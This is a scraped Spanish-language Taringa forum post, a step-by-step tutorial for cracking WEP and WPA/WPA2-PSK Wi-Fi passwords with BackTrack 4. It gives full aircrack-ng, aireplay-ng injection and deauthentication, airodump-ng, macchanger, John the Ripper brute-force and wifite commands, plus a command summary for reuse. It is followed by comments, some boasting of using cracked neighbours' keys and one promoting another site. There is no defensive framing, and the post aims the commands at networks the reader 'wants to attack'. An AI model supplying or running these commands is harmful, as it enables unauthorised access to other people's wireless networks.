1/15taringa.net/posts/info/13136260/Crakear-Wep-y-WPA_WPA2_PSK-100_25-seguro-con-Backtrack-4.html
Inicio Novatos Destacados
Crakear Wep y WPA/WPA2/PSK 100% seguro conBacktrack 4
Avisos por Yahoo!
Escuela de Idiomas
Técnica De Enseñanza Europea. Inscripciones abiertas. ¿Qué Esperas?
AmericanSchoolWay.com
ALUCINANTE
Nuevo Reporte Gratis para Aumentar Tu Memoria. Solo por tiempo limitado
Memoria-Humana.com
Postres para la familia
Disfruta junto a tu familia de Holanda Cremisse, un postre helado
www.recepedia.com
1.1.introducion
hoy les enseñare como crackear wep,wpa,wpa2,psk desde 0 con un CD live de backtrack 4
1.2-descargen: backtrack 4
Aqui esta el link:http://www.backtrack-linux.org/downloads/
2-una vez descargado colocamos el dvd con backtrack y boteamos dese la
lectora veremos algo asi
una ves selecionada, cargara los archivos necesarios y colocaremos en la consola el comando:
startx
una vez tipeado,presionamos enter y nos llevara al escritorio en donde encotraremos las herramientas para trabajar.
en la parte inferior derecha veremos una bandera si damos click con el boton secundario del mouse, podemos cambiar el
teclado por el español para que sea mas facil insertar comandos en la consola.
Buscar...
Posts Comunidades Música Juegos TOPs Global
INFO | HACE MÁS DE 9 MESES TwittearTwittear 105Me gusta 13
Experto
2.786Seguidores
161Puntos
6Posts
Ver más del autor »
ElFu3rt3
Hackear Wifi wep
wpa wpa2 backtrack 4
psk
Tags
Compartido por
IdentificarmeIdentificarme
Arqueología en México
Píramides, templos y ruinas famosas Conócelas.
adsinimages.com
2/15taringa.net/posts/info/13136260/Crakear-Wep-y-WPA_WPA2_PSK-100_25-seguro-con-Backtrack-4.html
click derecho en la bandera,configure,luego buscamos spain en el menu izquierdo,doble click en ella y ya la podremos
seleccionar para utilizarla.
3-cambiando nuestra mac:
lo primero que haremos sera cambiar nuestra mac para que sea mas facil de recordar accedemos a la consola y
tipeamos:
airmon-ng
3/15taringa.net/posts/info/13136260/Crakear-Wep-y-WPA_WPA2_PSK-100_25-seguro-con-Backtrack-4.html
como vemos en la imagen,mi interfaz se llama:
wlan0
lo que haremos ahora para detenerla para ello tipeamos:
airmon-ng stop wlan0
una vez hecho esto tipeamos lo siguiente:
ifconfig wlan0 down
4/15taringa.net/posts/info/13136260/Crakear-Wep-y-WPA_WPA2_PSK-100_25-seguro-con-Backtrack-4.html
ahora pasaremos a cambiar nuestra mac para ello tipeamos:
macchanger --mac
00:11:22:33:44:55 wlan0
si nos quedo algo como la imagen quiere decir que hemos hecho todos los pasos bien.
finalmente pondremos nuevamente nuestra tarjete en modo monitor tipeando la siguiente linea :
airmon- start wlan0
4-buscando redes:
para comenzar tipeamos la siguiente linea:
airodump-ng wlan0
para este tutuorial configure mi router con una pass wep.
como se puede ver aprecio mi red y tiene encriptacion wep lo que
haremos ahora sera parar el scaneo precionando ctrl+c
5-capturando #datas:
5/15taringa.net/posts/info/13136260/Crakear-Wep-y-WPA_WPA2_PSK-100_25-seguro-con-Backtrack-4.html
tipeamos la sigtes lineas:
airodump-ng -c1-wunderc0de --bssid D8:5D:4C:C7: DC:EE wlan0
me detendre un poco a explicar. como podran ver, coloque en azul algunos parametros.
en donde esta el 1 debemos modificarlo por el CANAL que es en donde
esta la CH en la imagen 10.en mi caso es el canal 1
donde dice underc0de, debemos modificarlo por un nombre que nosotros queramos por ultimo en donde esta la MAC
deben colocar
La MAC que estan atacando una vez ejecuta esta linea comenzara a capturar los #DATA que son datos nesesarios para
luego descifrar la pass
6-asociandonos a la red:
lo que haremos ahora sera asociarnos. para ello abrimos otra consola,
sin cerrar la anterior ya que seguira capturando los #datas que necesitaremos mas adelante.
en la nueva consola tipearemos:
aireplay-ng -1 0 -a
D8:5D:4C:C7: DC:EE -h
00:11:22:33:44:55 -e wlan0
en esta linea modificaremos lo azul nuevamente.en este caso la mac por la que estamos atacando y en donde dice mi
nombre por el ESSID
que estamos atacando,que en mi caso se llama ANTRAX.
si llegamos hasta aca y nos aparece eso de la imagen quire decir
que hasta el momento hemos hecho las cosas bien
de lo contrario aparece algun error, las causas pueden ser las sigtes:
-la red a la que quieres atacar esta muy lejos.
-tu tarjeta de red no puede hacer inyeccion de paquetes .
-el router tiene seguridad para evitar esta tipo de ataques.
7-inyectando trafico:
tipeamos ahora en la misma consola el sigte comando:
aireplay-ng -3 -b
D8:5D:4C:C7: DC:EE -h
00:11:22:33:44:55 wlan0
al igual que antes modificaremos la mac en azul
por la que estamos atacando.
6/15taringa.net/posts/info/13136260/Crakear-Wep-y-WPA_WPA2_PSK-100_25-seguro-con-Backtrack-4.html
una vez hecho esto comenzara a inyectar trafico y los #DATAS comenzaran a subir velozmente.
si llegamos hasta aca y tenemos todo bien estamos a solo un paso.recuerden que es nesesario capturar muchos #datas
mientras mas tengamos mejor la cantidad de #datas que debamos capturar dependera de que tan complicada sea la Pass
8-desencriptando la password:
hemos llegado al final...en una tercer consola,tipeamos los sigte:
aircrack-ng underc0de -01.cap
como siempre modificamos lo azul por el nombre que pusimos previamente en el paso 4. al ejecutar el comando la pass
se comenzara a desencriptar.
esperamos un momento a qu se desencripte, y si todo esta bien, nos tiriri la pass, de lo contrrio debemos seguir
capturando mas #datas hasta obtener la Pass.
como pueden ver en mi caso la pass es:under
9-wpa/wpa2 cracking
9.1 introduccion
en esta seccion les enseñare a crackear WPA/WPA2/PSK desde 0.
en la primera parte que fue de como iniciar desde dvd de backtrack,por lo tanto arrancaremos con la linea de comandos
en primer lugar,colocamos nuestra interfaz en modo monitor de la misma forma que el caso anterior (wep cracking)
9.2 capturando el handshake
la sigte linea de comando scanneara las redes cercanas:
airodump-ng mon0
como se puede ver aparece una red llamada ANTRAX
que sera la que atacare.
de este paso debemos tener en cuenta el canal en este caso es 1.EL BSSID y la STATION
una vez que sale la MAC de la red que deseamos atacar con una estacion frenamos el scanneo precionando CTRL+C
ahora tipeamos la siguiente linea:
airidump-ng mon0 --channel 1 --bssid D8:5D:4C:C7: DC:EE -w/tmp/wpa2
7/15taringa.net/posts/info/13136260/Crakear-Wep-y-WPA_WPA2_PSK-100_25-seguro-con-Backtrack-4.html
seguido a esto nos aparecera una imagen de la red sin clientes conectados y en otra consola tipeamos:
aireplay-ng -0 1 -a D8:5D:4C:C7: DC:EE -C 70: F1:A1:94:E8:34 mon0
una vez tipeado esto,podremos ver que aparaceran redes en otra consola y podremos capturar el handshake.
como se puede ver en la ultima imagen, hemos capturado el handshake,ahora lo que nos queda es desencriptar la
password esto se puede hacer de dos formas
1-bruteandola con el jonh the ripper
2-por medio de diccionario
10.obteniendo la clave:
para hacerla por medio de aircrack tipeamos la sigtes lineas:
aircrack-ng -w
8/15taringa.net/posts/info/13136260/Crakear-Wep-y-WPA_WPA2_PSK-100_25-seguro-con-Backtrack-4.html
/pentest/passwords/wordlists/wpa. txt -b D8:5D:4C:C7: DC:EE /tmp/wpa2*.cap
en este caso estoy utilizando el diccionario que viene con bactrack.
ustedes pueden utilizar sus propios diccionarios y corrigen la ruta del mismo como podran ver,ahi obtuvo la clave y en este
caso es: thisisatest
ahora veamos la forma de hacerlo por medio de jonh the ripper.
tipeamos el sigte comando:
/pentest/password/jtr/jonh -- stdount --incremental:all | aircrack-ng -b D8:5D:4C:C7: DC:EE -w - /tmp/wpa2*.cap
recuerden cambiar la mac por la que estan atacando y el directorio si es que lo modificaron. ambos metodos,tantos por
diccionario como
por jonh the ripper suelen demorar dependiendo la dificultad de la contraseña.
11-wep y wpa cracking con wifite:
11.1-introducion
ahora veremos como crackear wep o wpa sencilla con wifite
11.2-buscando red:
comenzaremos scanneando y bucaremos una red para sacarle la clave para ello abrimos una consola y tipeamos:
airodump-ng wlan0
9/15taringa.net/posts/info/13136260/Crakear-Wep-y-WPA_WPA2_PSK-100_25-seguro-con-Backtrack-4.html
recuerden que en mi caso mi interfaz se llama wlan0,ustedez deben colocar la suya
del scanneo debemos tener en cuenta el tipo de encriptacion en este caso es una wpa y el canal que aqui es 1 despues
paramos el scanneo con CTRL+C
12.interpretando el script wifite:
en mi caso lo guarde en el escritorio del backtrack por lo tanto debo tipear:
python wifite.py
una vez tipeado presionamos enter y se nos abrira el gui o el grafico de la tool.
13.configurando el wifite:
10/15taringa.net/posts/info/13136260/Crakear-Wep-y-WPA_WPA2_PSK-100_25-seguro-con-Backtrack-4.html
bueno como ven coloque mi interfaz el tipo de encriptacion (wpa)y el canal 1
lo otro que pueden modificar es la direccion del diccionario por uno propio que tengan en este tutorial usare el que viene
por defecto una vez hecho eso presionaremos el boton rojo h4x0r 1t n40
14.buscando el handshake y desencryptando la pass:
al ser todo automatico como ya lo notaron solo debemos esperar a que busque solo el handshake y saque la pass:
11/15taringa.net/posts/info/13136260/Crakear-Wep-y-WPA_WPA2_PSK-100_25-seguro-con-Backtrack-4.html
bueno com0 podemos ver pudo sacar la contraseña que en mi caso es malwares finalmente crea un log con un texto
como el sigte:
[2011-04-02 22:59:31] cracked wpa key for ANTRAX (D8:5D:4C:C7: DC:EE),the key is: malwares
resumen de codigos:
1.wep
NOTA:en todos los casos reemplazar:
XXXX:interface
ZZZZ:canal
YYYY:MAC BSSID
RRR:ESSID
1.1Cambiar la mac:
a.airmon-ng (ver la interface que usamos)
b.airmon.ng stop xxxx (detenemos el modo monitor)
c.ifconfig XXXX[/color] down (tiramos nuestra interface)
d.macchanger --mac 00:11:22:33:44:55 XXXX (cambiamos nuestra mac,
en este caso sera 00:11:22:33:44:55)
e.airmong-ng start XXXX (volvemos a iniciar el modo monitor)
12/15taringa.net/posts/info/13136260/Crakear-Wep-y-WPA_WPA2_PSK-100_25-seguro-con-Backtrack-4.html
TwittearTwittear
1013
Me gusta
1.2.buscar redes:
f. airodump-ng XXXX (scannea redes)
g.CTRL+C (detiene el scanneo)
h.airomdump-ng -c zzzz -w datas --bssid YYYY XXXX (capturamos #datas) [no cerrar consola]
1.3.asociandonos a la red(en otra consola)
I.airodump-ng -1 0 -a yyyy -h 00:11:22:33:44:55 -e RRR XXXX
(ASOCIACION CON LA RED)
1.4 inyectando trafico:
j.aireplay-ng -3 -b yyyy -h 00:11:22:33:44:55 XXXX (captura datas a mas velocidad)
1.5.desencriptando la clave (en otra consola)
k.aircrack-ng datas-01.cap (desencripta la clave con aircrack)
2.wpa/wpa2/psk:
NOTA:en todos los casos reemplazar:
XXXX:interface
ZZZZ:Canal
YYYY:MAC BSSID
RRR:Interface modo monitor
TTTT:Station
2.1.colocar la interface en modo monitor
a.aimon-ng (saber nuestra interface)
b.airmon-ng start XXXX[/color] (colocamos en modo monitor nuestra interface)
2.2.capturando el handshake:
c.airodump-ng RRR (scannea redes)
d.CTRL+C (frena el scanneo)
e.airodump-ng RRR --channel 1 -- bssid yyyy -w /tmp/wpa2 (guardara los *.cap en el directorio que le indiquemos)
f.aireplay-ng -0 1 -a yyyy -c tttt RRR(comenzara la captura del handshake)
2.3.obteniendo la clave:
g.1. aircrack-ng -w /pentest/passwords/wordlists/wpa.txt -b yyyy
/tmp/wpa2*.cap (saca la pass por diccionario)
g.2. /pentest/password/jtr/jonh --stdout --incremental:all |
aircrack-ng -b yyyy -w - /tmp/wpa2*.cap (saca la pass por fuerza bruta con jonh the ripper)
Buena suerte....
El contenido del post es de mi autoría, y/o, es un recopilación de distintas fuentes.
Fuentes de Información
0
Enviar
5
Dar puntos 1 2 3 4 5 6 7 8 9 +10
Votos: 17 - T! score: 7.5 / 10
126 Puntos
SeguirSeguir A favoritosA favoritos2
Seguidores
12.097Visitas
67Favoritos
Colaboración en líneaColabore con todo su equipo online. ¡Descárguese el software ahora!
www.TeamViewer.com
21 comentarios
@xavierantillanca hace 9 meses -8
Este post no tiene comentarios, Soyez le premier!
13/15taringa.net/posts/info/13136260/Crakear-Wep-y-WPA_WPA2_PSK-100_25-seguro-con-Backtrack-4.html
@Castasoy hace 9 meses
dsaadsfa dijo:
<span>Hola amigo! Te invito a esta pagina que es como Taringa pero con distinto diseño y
mejorado! <a href="http://www.zooflex.tuhost.es" class="smarterwiki-
linkify">www.zooflex.tuhost.es</a> o puedes ingresar tambiem por <a href="http://www.zooflex"
class="smarterwiki-linkify">www.zooflex</a>. co . cc (Todo junto)
Regalamos rangos New Full User hasta los 90 miembros! Apurate en registrarte que somos 72!
¿Que puedes hacer con el rango New Full User (NFU)?
- Dar 10 puntos por dia, por post
- Crear Comunidades
- Comentar posts en inicio
- Tus posts aparecen en inicio
- Y muchas cosas mas que el Novato no puede!
¿Que tiene de nuevo esta web que lo que tiene Taringa!?
- Galería de Fotos (Puedes votar foto con +1 o +-1)
- Muro en Perfil como facebook...
- Comentarios destacados.
Comentario de Bronce, a los 4 votos pisitivos
Comentario de Plata, a los 7 votos positivos
Comentario de Oro, a los 10 votos positivos
(Los comentarios con mas votos no aparecerán al principio de todos, es decir se quedan en el
lugar donde quedan)
Te esperamos!!!!! ¿Que esperas para unirte?</span>
Es una verg......a esa pagina no hay nada mejor k taringa
@DecodeUsers hace 9 meses
yo lo hice solo en 3 pasos y sin tanto pedo que mencionas tu
@tmliarx3 hace 9 meses +2
DecodeUsers dijo:
yo lo hice solo en 3 pasos y sin tanto pedo que mencionas tu
si claro 3 pasos
@amdasus hace 9 meses +1
DecodeUsers dijo:
yo lo hice solo en 3 pasos y sin tanto pedo que mencionas tu
Y porque no haces un post con tus 3 pasos, a ver si es verdad, al menos el compañero creador del post se
molesto haciendolo y tu solo vienes a criticar.
@Viento_Nocturno1 hace 9 meses
tmliarx3 dijo:
DecodeUsers dijo:
yo lo hice solo en 3 pasos y sin tanto pedo que mencionas tu
si claro 3 pasos
es verdad, utilice el backtrack 3, abres una shell, sacas el spoonwep, das unos 5 cliks mas y empieza a
trabajar solo, a los 5 minutos tienes tu clave:
como esta saqué 5 claves mas que son con las que navego ahora... porque con el 4 tiene que ser tan
complicado?
14/15taringa.net/posts/info/13136260/Crakear-Wep-y-WPA_WPA2_PSK-100_25-seguro-con-Backtrack-4.html
@Viento_Nocturno1 hace 9 meses
espero que ahora si se vea la fuckin imagen
@lorduruz hace 9 meses
pero eso es reventando una wep es la mas facil, la wap esa es la entretenida de abrir si no tienes la maldita
palabra en los diccionarios cargados olvídalo que la abres. ahora estoy usando la gpu para acelerar el
proceso de inyección pero nada cargue un diccionario de 27 millones de palabras y jajjajajajajjajajajaj nada.
@mp182000 hace 8 meses
muerte a los criticones!!! como "DecodeUsers" a estos tipos habría que demandarlos, porque después van a
ser futuros viejos chotos que se ponen a criticar y no hacen nada! ponete un post forro y deja laburar a la
gente en paz!!! BUEN POST cuando tenga te dejo puntos, a favoritooooossss
@HECTORSDGEN hace 8 meses
muy enredado tu post
@TheSamldn99 hace 7 meses
Muy bueno el post ehh .. +10 y reco
@ivan584 hace 7 meses
Ahora eres NFU Muy buen aporte.
@chumpitaz76 hace 7 meses -1
ivan584 dijo:
Ahora eres NFU Muy buen aporte.
@josealbert22 hace 6 meses
+10 , R+1 y Favoritos
@ElFu3rt3 hace 6 meses
YAH TU ERE DE LO MIO
@hax_1000 hace 5 meses
muy bueno amigo !; al igual ya lo sabia hace rato !!!, y veo que usas la version 4 de BT !:
checa la r5 !, ya esta con entorno gnome !!, me late mas que KDE !: pero cada quien !, buen tuto !, a mi me
daria flojera hacerlo jaja !, lo bueno que te tomaste el tiempo !, muchos estaran muy agradecirdo !
@hax_1000 hace 5 meses
Viento_Nocturno1 dijo:
15/15taringa.net/posts/info/13136260/Crakear-Wep-y-WPA_WPA2_PSK-100_25-seguro-con-Backtrack-4.html
esto es absurdo !; no seas inutil ponte a aprender mas !..
estas como los que usan el wifiway con el airoscript !. osea con menus y asistontos !. no manches
!.
espero que ahora si se vea la fuckin imagen
@landerB hace 4 meses -1
¿Sabías que el startx se usaba con las primeras distros de redhat y aún no existía el sudo... ?
@ExtremPro hace 3 meses -1
Oye brother sabes donde puedo descargar un diccionario español para WPA?
@GamerAk47 hace 2 meses
exelente muy bien !!! un lujo
@draccox hace 1 mes
ese link me manda solo a las versiones del BT5
Relacionados
Ir al cieloBuscar...
Anunciar Ayuda Prensa Protocolo Desarrolladores Denuncias Report Abuse - DMCA Términos y condiciones Privacidad de datos Buscar
amigos
Como hackear clave wep wifi
Obtener claves WPA WPA2 PSK en Windows (CommView)
Obtener la clave de una red WIFI WEP
Desencriptando redes WPA/WPA2
Crackear WEP´s - WPA/WPA2/PSK
Crackear WEP´s - WPA/WPA2/PSK [Resumen de Codigos]
Conectar Ubuntu a red WPA/WPA2
hackear la red inalambrica facil!!!!